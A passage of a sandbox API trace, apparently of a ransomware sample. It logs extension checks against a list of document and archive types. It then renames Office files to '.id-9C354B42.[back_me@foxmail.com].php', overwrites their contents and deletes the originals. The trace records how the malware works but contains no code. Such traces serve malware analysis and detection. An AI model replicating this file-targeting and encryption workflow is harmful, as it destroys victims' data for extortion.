[0039.786] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.786] lstrlenW (lpString=".rar") returned 4 [0039.786] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString=".bz2") returned 4 [0039.786] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString=".7z") returned 3 [0039.786] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.786] lstrlenW (lpString=".dbf") returned 4 [0039.786] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.786] lstrlenW (lpString=".1cd") returned 4 [0039.786] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.786] lstrlenW (lpString=".jpg") returned 4 [0039.786] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.786] lstrlenW (lpString=".doc") returned 4 [0039.787] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString=".docx") returned 5 [0039.787] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0039.787] lstrlenW (lpString=".pdf") returned 4 [0039.787] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString=".xls") returned 4 [0039.787] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString=".xlsx") returned 5 [0039.787] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0039.787] lstrlenW (lpString=".ppt") returned 4 [0039.787] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.787] lstrlenW (lpString=".zip") returned 4 [0039.787] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.787] lstrlenW (lpString=".rar") returned 4 [0039.787] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString=".bz2") returned 4 [0039.787] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString=".7z") returned 3 [0039.787] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.787] lstrlenW (lpString=".dbf") returned 4 [0039.787] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.787] lstrlenW (lpString=".1cd") returned 4 [0039.787] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 61 [0039.787] lstrlenW (lpString=".jpg") returned 4 [0039.787] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.788] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.788] lstrlenW (lpString="ipsrom.xml") returned 10 [0039.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.788] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2644) returned 1 [0039.788] CloseHandle (hObject=0x1c0) returned 1 [0039.788] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0x20 [0039.788] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0039.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.792] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fc6c | out: lpNewFilePointer=0x0) returned 1 [0039.792] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.792] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x312fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x312fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.797] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x312fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.797] ReadFile (in: hFile=0x1c0, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x312fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x312fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.801] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x312fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.801] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x312fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.801] ReadFile (in: hFile=0x1c0, lpBuffer=0x36f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x312fc38, lpOverlapped=0x0 | out: lpBuffer=0x36f0058*, lpNumberOfBytesRead=0x312fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.027] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.027] WriteFile (in: hFile=0x1c0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x312fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0040.143] SetEndOfFile (hFile=0x1c0) returned 1 [0040.143] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0040.147] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.147] WriteFile (in: hFile=0x1c0, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x312fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x312fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.149] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x312fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.149] WriteFile (in: hFile=0x1c0, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x312fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x312fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.151] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x312fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.151] WriteFile (in: hFile=0x1c0, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x312fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x312fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.153] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0040.153] CloseHandle (hObject=0x1c0) returned 1 [0040.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.760] lstrlenW (lpString=".doc") returned 4 [0040.760] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.760] lstrlenW (lpString=".docx") returned 5 [0040.760] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0040.760] lstrlenW (lpString=".pdf") returned 4 [0040.760] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.760] lstrlenW (lpString=".xls") returned 4 [0040.760] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.760] lstrlenW (lpString=".xlsx") returned 5 [0040.760] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0040.760] lstrlenW (lpString=".ppt") returned 4 [0040.760] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.760] lstrlenW (lpString=".zip") returned 4 [0040.760] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.760] lstrlenW (lpString=".rar") returned 4 [0040.760] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.760] lstrlenW (lpString=".bz2") returned 4 [0040.760] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.760] lstrlenW (lpString=".7z") returned 3 [0040.761] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.761] lstrlenW (lpString=".dbf") returned 4 [0040.761] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.761] lstrlenW (lpString=".1cd") returned 4 [0040.761] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.761] lstrlenW (lpString=".jpg") returned 4 [0040.761] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.761] lstrlenW (lpString=".doc") returned 4 [0040.761] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString=".docx") returned 5 [0040.761] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0040.761] lstrlenW (lpString=".pdf") returned 4 [0040.761] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString=".xls") returned 4 [0040.761] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString=".xlsx") returned 5 [0040.761] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0040.761] lstrlenW (lpString=".ppt") returned 4 [0040.761] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.761] lstrlenW (lpString=".zip") returned 4 [0040.761] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString=".rar") returned 4 [0040.761] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.761] lstrlenW (lpString=".bz2") returned 4 [0040.761] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.761] lstrlenW (lpString=".7z") returned 3 [0040.761] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.761] lstrlenW (lpString=".dbf") returned 4 [0040.762] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.762] lstrlenW (lpString=".1cd") returned 4 [0040.762] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0040.762] lstrlenW (lpString=".jpg") returned 4 [0040.762] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.762] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.762] lstrlenW (lpString="SETUP.XML") returned 9 [0040.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.691] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=9352) returned 1 [0041.691] CloseHandle (hObject=0x1b4) returned 1 [0041.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 0x20 [0041.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.691] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.691] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0041.692] GetLastError () returned 0x0 [0041.692] ReadFile (in: hFile=0x1b4, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x2488, lpOverlapped=0x0) returned 1 [0041.840] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x2490, lpOverlapped=0x0) returned 1 [0041.841] ReadFile (in: hFile=0x1b4, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.841] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.841] SetEndOfFile (hFile=0x198) returned 1 [0041.842] CloseHandle (hObject=0x198) returned 1 [0042.137] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.137] SetEndOfFile (hFile=0x1b4) returned 1 [0042.138] CloseHandle (hObject=0x1b4) returned 1 [0042.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.138] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 1 [0042.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.139] lstrlenW (lpString=".doc") returned 4 [0042.139] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.139] lstrlenW (lpString=".docx") returned 5 [0042.139] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.139] lstrlenW (lpString=".pdf") returned 4 [0042.139] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.139] lstrlenW (lpString=".xls") returned 4 [0042.139] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.139] lstrlenW (lpString=".xlsx") returned 5 [0042.139] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.139] lstrlenW (lpString=".ppt") returned 4 [0042.139] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.139] lstrlenW (lpString=".zip") returned 4 [0042.139] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.139] lstrlenW (lpString=".rar") returned 4 [0042.139] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.139] lstrlenW (lpString=".bz2") returned 4 [0042.139] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.139] lstrlenW (lpString=".7z") returned 3 [0042.139] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.139] lstrlenW (lpString=".dbf") returned 4 [0042.139] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.140] lstrlenW (lpString=".1cd") returned 4 [0042.140] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.140] lstrlenW (lpString=".jpg") returned 4 [0042.140] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.140] lstrlenW (lpString=".doc") returned 4 [0042.140] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString=".docx") returned 5 [0042.140] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.140] lstrlenW (lpString=".pdf") returned 4 [0042.140] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString=".xls") returned 4 [0042.140] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString=".xlsx") returned 5 [0042.140] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.140] lstrlenW (lpString=".ppt") returned 4 [0042.140] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.140] lstrlenW (lpString=".zip") returned 4 [0042.140] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.140] lstrlenW (lpString=".rar") returned 4 [0042.140] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString=".bz2") returned 4 [0042.140] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.140] lstrlenW (lpString=".7z") returned 3 [0042.140] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.140] lstrlenW (lpString=".dbf") returned 4 [0042.141] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.141] lstrlenW (lpString=".1cd") returned 4 [0042.141] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0042.141] lstrlenW (lpString=".jpg") returned 4 [0042.141] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.141] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.141] lstrlenW (lpString="Proof.XML") returned 9 [0042.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.174] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1457) returned 1 [0042.174] CloseHandle (hObject=0x218) returned 1 [0042.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 0x20 [0042.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0042.174] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.174] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0042.175] GetLastError () returned 0x0 [0042.175] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x5b1, lpOverlapped=0x0) returned 1 [0042.190] WriteFile (in: hFile=0x21c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0042.191] ReadFile (in: hFile=0x218, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.191] WriteFile (in: hFile=0x21c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, 